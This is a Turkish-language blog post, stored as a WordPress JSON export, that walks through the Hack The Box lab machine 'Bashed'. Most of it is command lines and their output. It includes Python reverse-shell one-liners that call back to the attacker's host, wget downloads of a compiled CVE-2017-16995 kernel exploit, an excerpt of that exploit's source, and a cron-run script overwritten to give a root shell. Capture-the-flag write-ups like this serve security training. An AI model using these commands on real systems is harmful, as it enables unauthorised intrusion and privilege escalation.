{"id":1465,"date":"2021-08-03T00:07:08","date_gmt":"2021-08-03T00:07:08","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1465"},"modified":"2021-08-03T00:07:08","modified_gmt":"2021-08-03T00:07:08","slug":"bashed","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/03\/bashed\/","title":{"rendered":"Bashed"},"content":{"rendered":"\n\n\n\n\n
Makine Ad\u0131<\/th>\nSeviye<\/th>\nOS<\/th>\nLogo<\/th>\n<\/tr>\n<\/thead>\n
Bashed<\/a> - HTB<\/td>\nKolay<\/td>\nLinux<\/td>\n\"\"<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

Walkthrough<\/h2>\n

nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n

\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Arrexel's Development Site\n<\/code><\/pre>\n
gobuster ile devam edelim.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/htb\/Linux\/Bashed]\n\u2514\u2500# gobuster dir --add-slash --expanded --extensions php,txt,html,js --follow-redirect --url http:\/\/10.10.10.68\/ --no-error -t 50 --wordlist \/usr\/share\/wordlists\/dirb\/big.txt | tee gobuster1\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.68\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,js,php,txt\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/08\/02 18:47:18 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.68\/.htaccess.php        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.68\/.htaccess.txt        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.68\/.htaccess.html       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.68\/.htaccess.js         (Status: 403) [Size: 298]\nhttp:\/\/10.10.10.68\/.htaccess\/           (Status: 403) [Size: 296]\nhttp:\/\/10.10.10.68\/.htpasswd.php        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.68\/.htpasswd.txt        (Status: 403) [Size: 299]\nhttp:\/\/10.10.10.68\/.htpasswd.html       (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.68\/.htpasswd.js         (Status: 403) [Size: 298]\nhttp:\/\/10.10.10.68\/.htpasswd\/           (Status: 403) [Size: 296]\nhttp:\/\/10.10.10.68\/about.html           (Status: 200) [Size: 8193]\nhttp:\/\/10.10.10.68\/config.php           (Status: 200) [Size: 0]   \nhttp:\/\/10.10.10.68\/contact.html         (Status: 200) [Size: 7805]\nhttp:\/\/10.10.10.68\/css\/                 (Status: 200) [Size: 1758]\nhttp:\/\/10.10.10.68\/dev\/                 (Status: 200) [Size: 1148]\nhttp:\/\/10.10.10.68\/fonts\/               (Status: 200) [Size: 2095]\nhttp:\/\/10.10.10.68\/icons\/               (Status: 403) [Size: 292] \nhttp:\/\/10.10.10.68\/images\/              (Status: 200) [Size: 1564]\nhttp:\/\/10.10.10.68\/index.html           (Status: 200) [Size: 7743]\nhttp:\/\/10.10.10.68\/js\/                  (Status: 200) [Size: 3165]\nhttp:\/\/10.10.10.68\/php\/                 (Status: 200) [Size: 939] \nhttp:\/\/10.10.10.68\/scroll.html          (Status: 200) [Size: 10863]\nhttp:\/\/10.10.10.68\/server-status\/       (Status: 403) [Size: 300]  \nhttp:\/\/10.10.10.68\/single.html          (Status: 200) [Size: 7477] \nhttp:\/\/10.10.10.68\/uploads\/             (Status: 200) [Size: 14]  <\/code><\/pre>\n
\u0130nternet sayfas\u0131na gitti\u011fimde bir web shell hizmeti veren github projesi oldu\u011funu g\u00f6rd\u00fcm. Bunun \u00fczerine sistemde web shell arad\u0131m ve http:\/\/10.10.10.68\/dev\/phpbash.php<\/a><\/strong> adresinde buldum. Python ile reverse alal\u0131m.<\/p>\n
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["\/bin\/sh","-i"]);'<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# nc -lvp 4444\nlistening on [any] 4444 ...\n10.10.10.68: inverse host lookup failed: Unknown host\nconnect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 39346\n\/bin\/sh: 0: can't access tty; job control turned off\n$ whoami\nwww-data\n<\/code><\/pre>\n
\u0130lk flag:<\/p>\n
\n$ ls\ntotal 36\ndrwxr-xr-x 4 arrexel arrexel 4096 Dec  4  2017 .\ndrwxr-xr-x 4 root    root    4096 Dec  4  2017 ..\n-rw------- 1 arrexel arrexel    1 Dec 23  2017 .bash_history\n-rw-r--r-- 1 arrexel arrexel  220 Dec  4  2017 .bash_logout\n-rw-r--r-- 1 arrexel arrexel 3786 Dec  4  2017 .bashrc\ndrwx------ 2 arrexel arrexel 4096 Dec  4  2017 .cache\ndrwxrwxr-x 2 arrexel arrexel 4096 Dec  4  2017 .nano\n-rw-r--r-- 1 arrexel arrexel  655 Dec  4  2017 .profile\n-rw-r--r-- 1 arrexel arrexel    0 Dec  4  2017 .sudo_as_admin_successful\n-r--r--r-- 1 arrexel arrexel   33 Dec  4  2017 user.txt\n$ cat user.txt  \n2c281f318555dbc1b856957c7147bfc1<\/code><\/pre>\n
\u015eimdi yetki y\u00fckseltelim.<\/p>\n
www-data@bashed:\/tmp$ sudo -l\nsudo -l\nMatching Defaults entries for www-data on bashed:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser www-data may run the following commands on bashed:\n    (scriptmanager : scriptmanager) NOPASSWD: ALL\nwww-data@bashed:\/tmp$ \n\nwww-data@bashed:\/tmp$ sudo -u scriptmanager \/bin\/bash\nsudo -u scriptmanager \/bin\/bash\nscriptmanager@bashed:\/tmp$ id\nid\nuid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)<\/code><\/pre>\n
root olmak i\u00e7in incelemeler yaparken ilk olarak kernel exploit ile root oldum ancak root olduktan sonra ba\u015fka bir \u015fekilde root olabilece\u011fime inan\u0131yordum \u00e7\u00fcnk\u00fc enum a\u015famas\u0131nda a\u015fa\u011f\u0131daki sonu\u00e7lar\u0131 bulmu\u015ftum. Buradaki python script'i bo\u015funa b\u0131rak\u0131lmam\u0131\u015ft\u0131r diye d\u00fc\u015f\u00fcnm\u00fc\u015ft\u00fcm.<\/p>\n
scriptmanager@bashed:\/$ find \/ -writable -type f -exec ls -al {} \\; 2>\/dev\/null\n<d \/ -writable -type f -exec ls -al {} \\; 2>\/dev\/null                        \n-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 \/scripts\/test.py\n-rw-r--r-- 1 scriptmanager scriptmanager 655 Dec  4  2017 \/home\/scriptmanager\/.profile\n-rw-r--r-- 1 scriptmanager scriptmanager 3786 Dec  4  2017 \/home\/scriptmanager\/.bashrc\n-rw------- 1 scriptmanager scriptmanager 2 Dec  4  2017 \/home\/scriptmanager\/.bash_history\n-rw-r--r-- 1 scriptmanager scriptmanager 220 Dec  4  2017 \/home\/scriptmanager\/.bash_logout\n--w--w--w- 1 root root 0 Aug  2 16:03 \/sys\/fs\/cgroup\/memory\/cgroup.event_control\n-rw-rw-rw- 1 root root 0 Aug  2 15:43 \/sys\/kernel\/security\/apparmor\/policy\/.remove\n\n...<\/code><\/pre>\n
Linux makinelerde yapt\u0131\u011f\u0131m lse.sh script'ini \u00e7al\u0131\u015ft\u0131rd\u0131m daha sonras\u0131nda kernelpop \u00e7al\u0131\u015ft\u0131rd\u0131m ve a\u015fa\u011f\u0131daki exploit ile root olabilidm.<\/p>\n
\nscriptmanager@bashed:\/tmp\/kernelpop-master$ python kernelpop.py\npython kernelpop.py\n\n##########################                                                                                                                                   \n#  welcome to kernelpop  #                                                                                                                                   \n#                        #                                                                                                                                   \n# let's pop some kernels #                                                                                                                                   \n##########################                                                                                                                                   \n\n[*] grabbing distro version and release from underlying OS (linuxubuntu16)\n[*] grabbing kernel version from 'uname -a'\n[!] could only get the kernel base...may not have accurate matches\n[+] kernel (Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU\/Linux) identified as:\n[base]\n        type:                   linux\n        distro:                 linuxubuntu16\n        version:                4.4.0-62\n        architecture:           x86_64\n[!] no specific distro kernel discovered...likelihood of false positives is high\n[*] matching kernel to known exploits\n[+] discovered 9 possible exploits !\n        [[ base linux kernel vulnerable ]]\n                CVE20177308     `packet_set_ring` in net\/packet\/af_packet.c can gain privileges via crafted system calls.\n                CVE20160728     `join_session_keyring` function can be abused to get root NOTE: (takes about 30 minutes)\n                CVE20162384     Double free vulnerability in the `snd_usbmidi_create` (requires physical proximity)\n                CVE20165195_64  Dirty COW race condition root priv esc for 64 bit\n                CVE20165195_64_poke     Dirty COW race condition root priv esc for 64 bit (poke variant)\n                CVE20173630     Stack clash vuln in solaris\n                CVE20176074     `dccp_rcv_state_process` in net\/dccp\/input.c mishandles structs and can lead to local root\n                CVE201716996    eBPF Verifier check_alu_op() Sign Extension Local Root Exploit\n                CVE20171000112  ip_ufo_append_data() memory corruption flaw can be exploited to gain root privileges.\n<\/code><\/pre>\n
Makinede gcc yoktu, kalimde derleyerek s\u0131ras\u0131yla gittim ve CVE201716996<\/strong> explotinde ba\u015far\u0131l\u0131 oldum.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/kernelpop]\n\u2514\u2500# python3 kernelpop.py -e CVE201716996 -d             \n\n##########################                                                                                                                                   \n#  welcome to kernelpop  #                                                                                                                                   \n#                        #                                                                                                                                   \n# let's pop some kernels #                                                                                                                                   \n##########################                                                                                                                                   \n\n[*] attempting to locate exploit CVE201716996\n        [+] exploit found!\n        [*] writing the exploit source to disk (\/tmp\/CVE201716996.c)\n[+] successfully written to disk\n\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/kernelpop]\n\u2514\u2500# head \/tmp\/CVE201716996.c\n\n\/*\n  Credit @bleidl, this is a slight modification to his original POC\n  https:\/\/github.com\/brl\/grlh\/blob\/master\/get-rekt-linux-hardened.c\n\n  For details on how the exploit works, please visit\n  https:\/\/ricklarabee.blogspot.com\/2018\/07\/ebpf-and-analysis-of-get-rekt-linux.html\n\n  Tested on Ubuntu 16.04 with the following Kernels\n  4.4.0-31-generic\n\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/kernelpop]\n\u2514\u2500# head \/tmp\/CVE201716996.c -n 50\n\n\/*\n  Credit @bleidl, this is a slight modification to his original POC\n  https:\/\/github.com\/brl\/grlh\/blob\/master\/get-rekt-linux-hardened.c\n\n  For details on how the exploit works, please visit\n  https:\/\/ricklarabee.blogspot.com\/2018\/07\/ebpf-and-analysis-of-get-rekt-linux.html\n\n  Tested on Ubuntu 16.04 with the following Kernels\n  4.4.0-31-generic\n  4.4.0-62-generic\n  4.4.0-81-generic\n  4.4.0-116-generic\n  4.8.0-58-generic\n  4.10.0.42-generic\n  4.13.0-21-generic\n\n  Tested on Fedora 27\n  4.13.9-300\n  gcc cve-2017-16995.c -o cve-2017-16995\n  internet@client:~\/cve-2017-16995$ .\/cve-2017-16995\n  [.]\n  [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n  [.]\n  [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n  [.]\n  [*] creating bpf map\n  [*] sneaking evil bpf past the verifier\n  [*] creating socketpair()\n  [*] attaching bpf backdoor to socket\n  [*] skbuff => ffff880038c3f500  \n  [*] Leaking sock struct from ffff88003af5e180\n  [*] Sock->sk_rcvtimeo at offset 472\n  [*] Cred structure at ffff880038704600\n  [*] UID from cred structure: 1000, matches the current: 1000\n  [*] hammering cred structure at ffff880038704600\n  [*] credentials patched, launching shell...\n  #id\n  uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)\n\n*\/\n\n#include <errno.h>\n#include <fcntl.h>\n#include <stdarg.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <linux\/bpf.h>\n\n\u250c\u2500\u2500(root💀kali)-[~\/tool\/kernelpop]\n\u2514\u2500# gcc \/tmp\/CVE201716996.c -o \/root\/htb\/Linux\/Bashed\/CVE201716996  \n<\/code><\/pre>\n
exploti derledikten sonra hedef makineye http \u00fczerinden yollad\u0131m.<\/p>\n
\nscriptmanager@bashed:\/tmp$ id\nid\nuid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)\nscriptmanager@bashed:\/tmp$ wget http:\/\/10.10.14.15\/CVE201716996\nwget http:\/\/10.10.14.15\/CVE201716996\n--2021-08-02 16:43:32--  http:\/\/10.10.14.15\/CVE201716996\nConnecting to 10.10.14.15:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 22272 (22K) [application\/octet-stream]\nSaving to: 'CVE201716996'\n\nCVE201716996        100%[===================>]  21.75K  --.-KB\/s    in 0.08s   \n\n2021-08-02 16:43:32 (287 KB\/s) - 'CVE201716996' saved [22272\/22272]\n\nscriptmanager@bashed:\/tmp$ chmod 777 CVE201716996\nchmod 777 CVE201716996\nscriptmanager@bashed:\/tmp$ .\/CVE201716996\n.\/CVE201716996\n[.] \n[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n[.] \n[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n[.] \n[*] creating bpf map\n[*] sneaking evil bpf past the verifier\n[*] creating socketpair()\n[*] attaching bpf backdoor to socket\n[*] skbuff => ffff8800366cbf00\n[*] Leaking sock struct from ffff88003677c400\n[*] Sock->sk_rcvtimeo at offset 472\n[*] Cred structure at ffff88000003d380\n[*] UID from cred structure: 1001, matches the current: 1001\n[*] hammering cred structure at ffff88000003d380\n[*] credentials patched, launching shell...\n# id\nid\nuid=0(root) gid=0(root) groups=0(root),1001(scriptmanager)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt\n# cat root.txt\ncat root.txt\ncc4f0afe3a1026d402ba10329674a8e2\n<\/code><\/pre>\n
Evet! \u015eimdi gelelim 2. yola. Buldu\u011fum test.py dosyas\u0131n\u0131n belirli aral\u0131klarla \u00e7al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131n\u0131 farkettim. \u0130\u00e7eri\u011fini okdu\u011fumuzda test.txt dosyas\u0131 olu\u015fturup i\u00e7ine yaz\u0131yor. \u015eimdi a\u015fa\u011f\u0131daki iki ls<\/code> komutuna ve test.txt dosyalar\u0131n\u0131n olu\u015fturulam tarihlerine bak\u0131n.<\/p>\n
\nscriptmanager@bashed:\/scripts$ ls\nls\ntotal 16\ndrwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .\ndrwxr-xr-x 23 root          root          4096 Dec  4  2017 ..\n-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py\n-rw-r--r--  1 root          root            12 Aug  2 16:51 test.txt\nscriptmanager@bashed:\/scripts$ cat test.py\ncat test.py\nf = open("test.txt", "w")\nf.write("testing 123!")\nf.close\nscriptmanager@bashed:\/scripts$ ls -al  \nls -al\ntotal 16\ndrwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .\ndrwxr-xr-x 23 root          root          4096 Dec  4  2017 ..\n-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py\n-rw-r--r--  1 root          root            12 Aug  2 16:52 test.txt\n<\/code><\/pre>\n
Bunun \u00fczerine kalimde bir python reverse olu\u015fturdum ve buraya http arac\u0131l\u0131\u011f\u0131 ile kopyalad\u0131m.<\/p>\n
\nwget http:\/\/10.10.14.15\/test.py\n--2021-08-02 16:56:32--  http:\/\/10.10.14.15\/test.py\nConnecting to 10.10.14.15:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 258 [text\/x-python]\nSaving to: 'test.py'\n\ntest.py             100%[===================>]     258  --.-KB\/s    in 0s      \n\n2021-08-02 16:56:32 (34.6 MB\/s) - 'test.py' saved [258\/258]\n\nscriptmanager@bashed:\/scripts$ cat test.py\ncat test.py\nimport os\n\nos.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.15\\",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"\/bin\/sh\\",\\"-i\\"]);'")\n<\/code><\/pre>\n
\n(root💀kali)-[~]\n\u2514\u2500# nc -lvp 1822\nlistening on [any] 1822 ...\n10.10.10.68: inverse host lookup failed: Unknown host\nconnect to [10.10.14.15] from (UNKNOWN) [10.10.10.68] 48108\n\/bin\/sh: 0: can't access tty; job control turned off\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# <\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Makine Ad\u0131 Seviye OS Logo Bashed – HTB Kolay Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 80\/tcp open http Apache httpd 2.4.18…<\/p>\n
Devam\u0131n\u0131 okuBashed<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1465","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1465","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1465"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1465\/revisions"}],"predecessor-version":[{"id":1466,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1465\/revisions\/1466"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1465"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}